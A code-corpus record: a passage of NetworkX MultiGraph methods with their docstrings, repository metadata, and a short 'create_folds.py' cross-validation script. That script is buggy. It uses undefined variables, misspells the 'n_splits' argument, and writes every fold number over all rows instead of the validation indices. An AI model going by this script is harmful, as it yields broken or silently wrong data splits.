"""Returns the attribute dictionary associated with edge (u, v).
This is identical to `G[u][v][key]` except the default is returned
instead of an exception is the edge doesn't exist.
Parameters
----------
u, v : nodes
default : any Python object (default=None)
Value to return if the edge (u, v) is not found.
key : hashable identifier, optional (default=None)
Return data only for the edge with specified key.
Returns
-------
edge_dict : dictionary
The edge attribute dictionary.
Examples
--------
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> key = G.add_edge(0, 1, key="a", weight=7)
>>> G[0][1]["a"] # key='a'
{'weight': 7}
>>> G.edges[0, 1, "a"] # key='a'
{'weight': 7}
Warning: we protect the graph data structure by making
`G.edges` and `G[1][2]` read-only dict-like structures.
However, you can assign values to attributes in e.g.
`G.edges[1, 2, 'a']` or `G[1][2]['a']` using an additional
bracket as shown next. You need to specify all edge info
to assign to the edge data associated with an edge.
>>> G[0][1]["a"]["weight"] = 10
>>> G.edges[0, 1, "a"]["weight"] = 10
>>> G[0][1]["a"]["weight"]
10
>>> G.edges[1, 0, "a"]["weight"]
10
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.get_edge_data(0, 1)
{0: {}}
>>> e = (0, 1)
>>> G.get_edge_data(*e) # tuple form
{0: {}}
>>> G.get_edge_data("a", "b", default=0) # edge not in graph, return 0
0
"""
try:
if key is None:
return self._adj[u][v]
else:
return self._adj[u][v][key]
except KeyError:
return default
@property
def degree(self):
"""A DegreeView for the Graph as G.degree or G.degree().
The node degree is the number of edges adjacent to the node.
The weighted node degree is the sum of the edge weights for
edges incident to that node.
This object provides an iterator for (node, degree) as well as
lookup for the degree for a single node.
Parameters
----------
nbunch : single node, container, or all nodes (default= all nodes)
The view will only report edges incident to these nodes.
weight : string or None, optional (default=None)
The name of an edge attribute that holds the numerical value used
as a weight. If None, then each edge has weight 1.
The degree is the sum of the edge weights adjacent to the node.
Returns
-------
If a single node is requested
deg : int
Degree of the node, if a single node is passed as argument.
OR if multiple nodes are requested
nd_iter : iterator
The iterator returns two-tuples of (node, degree).
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.degree(0) # node 0 with degree 1
1
>>> list(G.degree([0, 1]))
[(0, 1), (1, 2)]
"""
return MultiDegreeView(self)
def is_multigraph(self):
"""Returns True if graph is a multigraph, False otherwise."""
return True
def is_directed(self):
"""Returns True if graph is directed, False otherwise."""
return False
def copy(self, as_view=False):
"""Returns a copy of the graph.
The copy method by default returns an independent shallow copy
of the graph and attributes. That is, if an attribute is a
container, that container is shared by the original an the copy.
Use Python's `copy.deepcopy` for new containers.
If `as_view` is True then a view is returned instead of a copy.
Notes
-----
All copies reproduce the graph structure, but data attributes
may be handled in different ways. There are four types of copies
of a graph that people might want.
Deepcopy -- A "deepcopy" copies the graph structure as well as
all data attributes and any objects they might contain.
The entire graph object is new so that changes in the copy
do not affect the original object. (see Python's copy.deepcopy)
Data Reference (Shallow) -- For a shallow copy the graph structure
is copied but the edge, node and graph attribute dicts are
references to those in the original graph. This saves
time and memory but could cause confusion if you change an attribute
in one graph and it changes the attribute in the other.
NetworkX does not provide this level of shallow copy.
Independent Shallow -- This copy creates new independent attribute
dicts and then does a shallow copy of the attributes. That is, any
attributes that are containers are shared between the new graph
and the original. This is exactly what `dict.copy()` provides.
You can obtain this style copy using:
>>> G = nx.path_graph(5)
>>> H = G.copy()
>>> H = G.copy(as_view=False)
>>> H = nx.Graph(G)
>>> H = G.__class__(G)
Fresh Data -- For fresh data, the graph structure is copied while
new empty data attribute dicts are created. The resulting graph
is independent of the original and it has no edge, node or graph
attributes. Fresh copies are not enabled. Instead use:
>>> H = G.__class__()
>>> H.add_nodes_from(G)
>>> H.add_edges_from(G.edges)
View -- Inspired by dict-views, graph-views act like read-only
versions of the original graph, providing a copy of the original
structure without requiring any memory for copying the information.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
Parameters
----------
as_view : bool, optional (default=False)
If True, the returned graph-view provides a read-only view
of the original graph without actually copying any data.
Returns
-------
G : Graph
A copy of the graph.
See Also
--------
to_directed: return a directed copy of the graph.
Examples
--------
>>> G = nx.path_graph(4) # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> H = G.copy()
"""
if as_view is True:
return nx.graphviews.generic_graph_view(self)
G = self.__class__()
G.graph.update(self.graph)
G.add_nodes_from((n, d.copy()) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, datadict.copy())
for u, nbrs in self._adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def to_directed(self, as_view=False):
"""Returns a directed representation of the graph.
Returns
-------
G : MultiDiGraph
A directed graph with the same name, same nodes, and with
each edge (u, v, data) replaced by two directed edges
(u, v, data) and (v, u, data).
Notes
-----
This returns a "deepcopy" of the edge, node, and
graph attributes which attempts to completely copy
all of the data and references.
This is in contrast to the similar D=DiGraph(G) which returns a
shallow copy of the data.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
Warning: If you have subclassed MultiGraph to use dict-like objects
in the data structure, those changes do not transfer to the
MultiDiGraph created by this method.
Examples
--------
>>> G = nx.Graph() # or MultiGraph, etc
>>> G.add_edge(0, 1)
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1), (1, 0)]
If already directed, return a (deep) copy
>>> G = nx.DiGraph() # or MultiDiGraph, etc
>>> G.add_edge(0, 1)
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1)]
"""
graph_class = self.to_directed_class()
if as_view is True:
return nx.graphviews.generic_graph_view(self, graph_class)
# deepcopy when not a view
G = graph_class()
G.graph.update(deepcopy(self.graph))
G.add_nodes_from((n, deepcopy(d)) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, deepcopy(datadict))
for u, nbrs in self.adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def to_undirected(self, as_view=False):
"""Returns an undirected copy of the graph.
Returns
-------
G : Graph/MultiGraph
A deepcopy of the graph.
See Also
--------
copy, add_edge, add_edges_from
Notes
-----
This returns a "deepcopy" of the edge, node, and
graph attributes which attempts to completely copy
all of the data and references.
This is in contrast to the similar `G = nx.MultiGraph(D)`
which returns a shallow copy of the data.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
Warning: If you have subclassed MultiiGraph to use dict-like
objects in the data structure, those changes do not transfer
to the MultiGraph created by this method.
Examples
--------
>>> G = nx.path_graph(2) # or MultiGraph, etc
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1), (1, 0)]
>>> G2 = H.to_undirected()
>>> list(G2.edges)
[(0, 1)]
"""
graph_class = self.to_undirected_class()
if as_view is True:
return nx.graphviews.generic_graph_view(self, graph_class)
# deepcopy when not a view
G = graph_class()
G.graph.update(deepcopy(self.graph))
G.add_nodes_from((n, deepcopy(d)) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, deepcopy(datadict))
for u, nbrs in self._adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def number_of_edges(self, u=None, v=None):
"""Returns the number of edges between two nodes.
Parameters
----------
u, v : nodes, optional (Gefault=all edges)
If u and v are specified, return the number of edges between
u and v. Otherwise return the total number of all edges.
Returns
-------
nedges : int
The number of edges in the graph. If nodes `u` and `v` are
specified return the number of edges between those nodes. If
the graph is directed, this only returns the number of edges
from `u` to `v`.
See Also
--------
size
Examples
--------
For undirected multigraphs, this method counts the total number
of edges in the graph::
>>> G = nx.MultiGraph()
>>> G.add_edges_from([(0, 1), (0, 1), (1, 2)])
[0, 1, 0]
>>> G.number_of_edges()
3
If you specify two nodes, this counts the total number of edges
joining the two nodes::
>>> G.number_of_edges(0, 1)
2
For directed multigraphs, this method can count the total number
of directed edges from `u` to `v`::
>>> G = nx.MultiDiGraph()
>>> G.add_edges_from([(0, 1), (0, 1), (1, 0)])
[0, 1, 0]
>>> G.number_of_edges(0, 1)
2
>>> G.number_of_edges(1, 0)
1
"""
if u is None:
return self.size()
try:
edgedata = self._adj[u][v]
except KeyError:
return 0 # no such edge
return len(edgedata)
| 35.548587
| 83
| 0.578763
|
7cf75211f74cde224dcc6e415965fb0b988a7ec2
| 539
|
py
|
Python
|
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
from sklearn import model_selection
if __name__ == "__main__":
df = pd.read_csv(f"{TRAIN_DATA}")
## Creating the folds
df['kfold']=-1
df=df.sample(frac=1).reset_index(drop=True)
y=df.target.values
kf = model_selection.StratifiedKFold(n_spliits=5)
## Begin Splitting
for fold_, (_, _)in enumerate(kf.split(X=df, y=y)):
df.loc[:, "kfold"]=fold_
df.to_csv(os.path.join(input_path, "train_folds.csv"), index=False)
print("\nFolds Successfully Created ...\n")
| 29.944444
| 71
| 0.662338
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.